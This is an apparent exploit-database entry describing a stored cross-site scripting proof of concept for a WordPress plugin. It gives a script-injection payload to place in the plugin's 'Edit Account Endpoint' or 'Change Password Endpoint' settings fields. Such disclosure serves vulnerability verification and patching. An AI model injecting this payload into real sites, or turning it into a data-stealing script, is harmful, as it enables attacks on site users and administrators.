## https://sploitus.com/exploit?id=WPEX-ID:A8625579-FE8F-4BC1-A641-0E26AD141C92
Put the following payload in the 'Edit Account Endpoint' or 'Change Password Endpoint' fields in the General > My Account plugin's settings: "><script>alert(/XSS/)</script>